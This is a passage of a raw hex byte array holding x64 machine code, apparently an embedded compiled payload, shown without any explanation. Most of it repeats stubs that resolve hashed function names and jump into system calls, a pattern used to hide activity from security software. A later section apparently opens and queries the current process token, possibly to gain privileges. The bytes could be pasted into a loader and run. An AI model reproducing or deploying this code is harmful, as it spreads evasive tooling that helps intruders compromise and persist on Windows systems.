xE8,0xA1,0xF5,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xC7,0xC1,0x18,0x39,0xA3,0x73,0x51,0x48,0x83,0xEC,0x28,0xE8,0xB5,0xF5,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0x4A,0xF5,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xC7,0xC1,0xFB,0x5E,0xAB,0x7C,0x51,0x48,0x83,0xEC,0x28,0xE8,0x5E,0xF5,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0xF3,0xF4,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xC7,0xC1,0x1E,0x5C,0x98,0x38,0x51,0x48,0x83,0xEC,0x28,0xE8,0x07,0xF5,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0x9C,0xF4,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xB9,0x82,0x4D,0xDF,0x84,0x00,0x00,0x00,0x00,0x51,0x48,0x83,0xEC,0x28,0xE8,0xAD,0xF4,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0x42,0xF4,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xB9,0x0C,0x86,0xB2,0xA1,0x00,0x00,0x00,0x00,0x51,0x48,0x83,0xEC,0x28,0xE8,0x53,0xF4,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0xE8,0xF3,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xC7,0xC1,0x80,0x2D,0x1F,0x0A,0x51,0x48,0x83,0xEC,0x28,0xE8,0xFC,0xF3,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0x91,0xF3,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xC7,0xC1,0x13,0x36,0x82,0x14,0x51,0x48,0x83,0xEC,0x28,0xE8,0xA5,0xF3,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0x3A,0xF3,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xB9,0x8A,0xF2,0x3D,0xE6,0x00,0x00,0x00,0x00,0x51,0x48,0x83,0xEC,0x28,0xE8,0x4B,0xF3,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0xE0,0xF2,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xC7,0xC1,0x3A,0x3D,0xA8,0x32,0x51,0x48,0x83,0xEC,0x28,0xE8,0xF4,0xF2,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0x89,0xF2,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xC7,0xC1,0x5C,0x59,0xF3,0x6A,0x51,0x48,0x83,0xEC,0x28,0xE8,0x9D,0xF2,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0x32,0xF2,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xB9,0x6E,0x23,0x30,0xE8,0x00,0x00,0x00,0x00,0x51,0x48,0x83,0xEC,0x28,0xE8,0x43,0xF2,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0xD8,0xF1,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xC7,0xC1,0xE3,0x55,0x3F,0x11,0x51,0x48,0x83,0xEC,0x28,0xE8,0xEC,0xF1,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0x81,0xF1,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xC7,0xC1,0x04,0x0E,0xDA,0x6B,0x51,0x48,0x83,0xEC,0x28,0xE8,0x95,0xF1,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0x2A,0xF1,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xC7,0xC1,0x10,0xDE,0xB1,0x12,0x51,0x48,0x83,0xEC,0x28,0xE8,0x3E,0xF1,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0xD3,0xF0,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xC7,0xC1,0x20,0x35,0x89,0x10,0x51,0x48,0x83,0xEC,0x28,0xE8,0xE7,0xF0,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0x7C,0xF0,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xC7,0xC1,0xB5,0x3A,0x1B,0x38,0x51,0x48,0x83,0xEC,0x28,0xE8,0x90,0xF0,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0x25,0xF0,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xC7,0xC1,0x9C,0xD0,0xC6,0x20,0x51,0x48,0x83,0xEC,0x28,0xE8,0x39,0xF0,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0xCE,0xEF,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xB9,0x3C,0xF4,0x9E,0xBA,0x00,0x00,0x00,0x00,0x51,0x48,0x83,0xEC,0x28,0xE8,0xDF,0xEF,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0x74,0xEF,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xB9,0x44,0x8D,0x66,0xCB,0x00,0x00,0x00,0x00,0x51,0x48,0x83,0xEC,0x28,0xE8,0x85,0xEF,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0x1A,0xEF,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xC7,0xC1,0x8F,0x59,0x39,0x13,0x51,0x48,0x83,0xEC,0x28,0xE8,0x2E,0xEF,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0xC3,0xEE,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xB9,0xBA,0x75,0xEB,0xB6,0x00,0x00,0x00,0x00,0x51,0x48,0x83,0xEC,0x28,0xE8,0xD4,0xEE,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0x69,0xEE,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xC7,0xC1,0xEF,0xD9,0xB0,0x1B,0x51,0x48,0x83,0xEC,0x28,0xE8,0x7D,0xEE,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0x12,0xEE,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xC7,0xC1,0xE7,0x84,0xCD,0x0A,0x51,0x48,0x83,0xEC,0x28,0xE8,0x26,0xEE,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0xBB,0xED,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xC7,0xC1,0x37,0x04,0x96,0x36,0x51,0x48,0x83,0xEC,0x28,0xE8,0xCF,0xED,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0x64,0xED,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xC7,0xC1,0x79,0x5C,0x2D,0x7A,0x51,0x48,0x83,0xEC,0x28,0xE8,0x78,0xED,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0x0D,0xED,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xB9,0x8F,0xCC,0x1A,0xCA,0x00,0x00,0x00,0x00,0x51,0x48,0x83,0xEC,0x28,0xE8,0x1E,0xED,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0xB3,0xEC,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xC7,0xC1,0x19,0xD6,0x26,0x0C,0x51,0x48,0x83,0xEC,0x28,0xE8,0xC7,0xEC,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0x5C,0xEC,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x30,0x41,0xB8,0x01,0x00,0x00,0x00,0x48,0x8D,0x05,0xAB,0x61,0x00,0x00,0x48,0x89,0xC2,0xB9,0x00,0x00,0x00,0x00,0xE8,0x37,0x01,0x00,0x00,0x89,0x45,0xFC,0x8B,0x45,0xFC,0x48,0x83,0xC4,0x30,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x30,0x41,0xB8,0x01,0x00,0x00,0x00,0x48,0x8D,0x05,0xAD,0x61,0x00,0x00,0x48,0x89,0xC2,0xB9,0x00,0x00,0x00,0x00,0xE8,0x09,0x01,0x00,0x00,0x89,0x45,0xFC,0x8B,0x45,0xFC,0x48,0x83,0xC4,0x30,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x30,0x48,0x89,0x4D,0x10,0x48,0x89,0x55,0x18,0x44,0x89,0x45,0x20,0x44,0x89,0x4D,0x28,0xC7,0x45,0xFC,0x00,0x00,0x00,0x00,0xC7,0x45,0xF8,0x00,0x00,0x00,0x00,0xC7,0x45,0xF0,0x01,0x00,0x00,0xC0,0x48,0x83,0x7D,0x18,0x00,0x74,0x06,0x83,0x7D,0x20,0x00,0x75,0x0A,0xB8,0x01,0x00,0x00,0x00,0xE9,0xB3,0x00,0x00,0x00,0x48,0x8B,0x45,0x10,0x48,0x85,0xC0,0x75,0x25,0xC7,0x45,0xF8,0x01,0x00,0x00,0x00,0x4C,0x8D,0x45,0x10,0xBA,0x28,0x00,0x00,0x00,0x48,0xC7,0xC1,0xFF,0xFF,0xFF,0xFF,0xE8,0xA8,0xED,0xFF,0xFF,0x89,0x45,0xF0,0x83,0x7D,0xF0,0x00,0x78,0x60,0xC7,0x45,0xF4,0x00,0x00,0x00,0x00,0xEB,0x46,0x8B,0x45,0xF4,0x48,0x8D,0x14,0xC5,0x00,0x00,0x00,0x00,0x48,0x8B,0x45,0x18,0x48,0x01,0xD0,0x48,0x8B,0x10,0x48,0x8B,0x45,0x10,0x8B,0x4D,0x28,0x41,0x89,0xC8,0x48,0x89,0xC1,0xE8,0x5B,0x00,0x00,0x00,0x89,0x45,0xFC,0x83,0x7D,0xFC,0x00,0x75,0x0C,0x83,0x7D,0xF8,0x00,0x74,0x06,0x83,0x7D,0x28,0x00,0x75,0x1E,0x83,0x7D,0xFC,0x00,0x74,0x1B,0x83,0x45,0xF4,0x01,0x8B,0x45,0xF4,0x3B,0x45,0x20,0x72,0xB2,0xC7,0x45,0xFC,0x01,0x00,0x00,0x00,0xEB,0x07,0x90,0xEB,0x04,0x90,0xEB,0x01,0x90,0x83,0x7D,0xF8,0x00,0x74,0x15,0x48,0x8B,0x45,0x10,0x48,0x85,0xC0,0x74,0x0C,0x48,0x8B,0x45,0x10,0x48,0x89,0xC1,0xE8,0xC6,0xEC,0xFF,0xFF,0x8B,0x45,0xFC,0x48,0x83,0xC4,0x30,0x5D,0xC3,0x55,0x53,0x48,0x81,0xEC,0xB8,0x00,0x00,0x00,0x48,0x8D,0xAC,0x24,0xB0,0x00,0x00,0x00,0x48,0x89,0x4D,0x20,0x48,0x89,0x55,0x28,0x44,0x89,0x45,0x30,0xC7,0x45,0xC4,0x00,0x00,0x00,0x00,0xC7,0x45,0xC0,0x08,0x00,0x00,0x00,0xC7,0x45,0xFC,0x00,0x00,0x00,0x00,0xC7,0x45,0xBC,0x00,0x00,0x00,0x00,0x8B,0x45,0xC0,0x89,0x45,0xE0,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xB0,0x00,0x00,0x00,0x00,0xC7,0x45,0xB8,0x00,0x00,0x00,0x00,0x66,0x0F,0xEF,0xC0,0x0F,0x11,0x45,0xA0,0x66,0x0F,0xEF,0xC0,0x0F,0x11,0x45,0x80,0x66,0x0F,0x7E,0x45,0x90,0x48,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0xC7,0x45,0xDC,0x01,0x00,0x00,0xC0,0xC7,0x45,0xE4,0x00,0x00,0x00,0x00,0xC7,0x45,0xD8,0x00,0x00,0x00,0x00,0xC7,0x45,0xD4,0x00,0x00,0x00,0x00,0xBA,0x01,0x00,0x00,0x00,0x48,0x8D,0x05,0x1E,0x60,0x00,0x00,0x48,0x89,0xC1,0xE8,0xE9,0xB0,0xFF,0xFF,0x41,0xB8,0x00,0x00,0x00,0x00,0xBA,0x1E,0xC1,0xA5,0x11,0x48,0x89,0xC1,0xE8,0xF7,0xAE,0xFF,0xFF,0x48,0x89,0x45,0xC8,0x48,0x83,0x7D,0xC8,0x00,0x0F,0x84,0x15,0x03,0x00,0x00,0x48,0x8B,0x45,0x20,0x48,0x85,0xC0,0x75,0x29,0xC7,0x45,0xE4,0x01,0x00,0x00,0x00,0x4C,0x8D,0x45,0x20,0xBA,0x28,0x00,0x00,0x00,0x48,0xC7,0xC1,0xFF,0xFF,0xFF,0xFF,0xE8,0x2A,0xEC,0xFF,0xFF,0x89,0x45,0xDC,0x83,0x7D,0xDC,0x00,0x0F,0x88,0xE6,0x02,0x00,0x00,0x8B,0x45,0xC0,0x89,0x45,0xE0,0x8B,0x45,0xC0,0x89,0xC3,0x48,0x8B,0x05,0xD6,0xCC,0x00,0x00,0xFF,0xD0,0x49,0x89,0xD8,0xBA,0x08,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0xCA,0xCC,0x00,0x00,0xFF,0xD0,0x48,0x89,0x45,0xF0,0x48,0x83,0x7D,0xF0,0x00,0x0F,0x84,0xB2,0x02,0x00,0x00,0x44,0x8B,0x45,0xC0,0x48,0x8B,0x45,0x20,0x48,0x8B,0x4D,0xF0,0x48,0x8D,0x55,0xC0,0x48,0x89,0x54,0x24,0x20,0x45,0x89,0xC1,0x49,0x89,0xC8,0xBA,0x03,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x3A,0xF1,0xFF,0xFF,0x89,0x45,0xDC,0x83,0x7D,0xDC,0x00,0x79,0x56,0x48,0x83,0x7D,0xF0,0x00,0x74,0x40,0x8B,0x55,0xE0,0x48,0x8B,0x45,0xF0,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0xEA,0x3A,0x00,0x00,0x48,0x8B,0x05,0x5B,0xCC,0x00,0x00,0xFF,0xD0,0x48,0x8B,0x55,0xF0,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0x53,0xCC,0x00,0x00,0xFF,0xD0,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0x81,0x7D,0xDC,0x23,0x00,0x00,0xC0,0x0F,0x84,0x44,0xFF,0xFF,0xFF,0xEB,0x01,0x90,0x83,0x7D,0xDC,0x00,0x0F,0x88,0x23,0x02,0x00,0x00,0xC7,0x45,0xFC,0x00,0x00,0x00,0x00,0xE9,0xFD,0x01,0x00,0x00,0x48,0x8B,0x4D,0xF0,0x8B,0x55,0xFC,0x48,0x89,0xD0,0x48,0x01,0xC0,0x48,0x01,0xD0,0x48,0xC1,0xE0,0x02,0x48,0x01,0xC8,0x48,0x8B,0x50,0x04,0x48,0x89,0x55,0xB0,0x8B,0x40,0x0C,0x89,0x45,0xB8,0xC7,0x45,0xBC,0x00,0x00,0x00,0x00,0x48,0x8D,0x55,0xBC,0x48,0x8D,0x45,0xB0,0x4C,0x8B,0x55,0xC8,0x49,0x89,0xD1,0x41,0xB8,0x00,0x00,0x00,0x00,0x48,0x89,0xC2,0xB9,0x00,0x00,0x00,0x00,0x41,0xFF,0xD2,0x89,0x45,0xD8,0x83,0x7D,0xD8,0x00,0x0F,0x85,0xC1,0x01,0x00,0x00,0x48,0x8B,0x05,0xAB,0xCB,0x00,0x00,0xFF,0xD0,0x83,0xF8,0x7A,0x0F,0x85,0xAF,0x01,0x00,0x00,0x8B,0x45,0xBC,0x83,0xC0,0x01,0x89,0x45,0xBC,0x8B,0x45,0xBC,0x89,0xC0,0x48,0x8D,0x1C,0x00,0x48,0x8B,0x05,0x8F,0xCB,0x00,0x00,0xFF,0xD0,0x49,0x89,0xD8,0xBA,0x08,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0x83,0xCB,0x00,0x00,0xFF,0xD0,0x48,0x89,0x45,0xE8,0x48,0x83,0x7D,0xE8,0x00,0x0F,0x84,0x74,0x01,0x00,0x00,0x48,0x8D,0x4D,0xBC,0x48,0x8B,0x55,0xE8,0x48,0x8D,0x45,0xB0,0x4C,0x8B,0x55,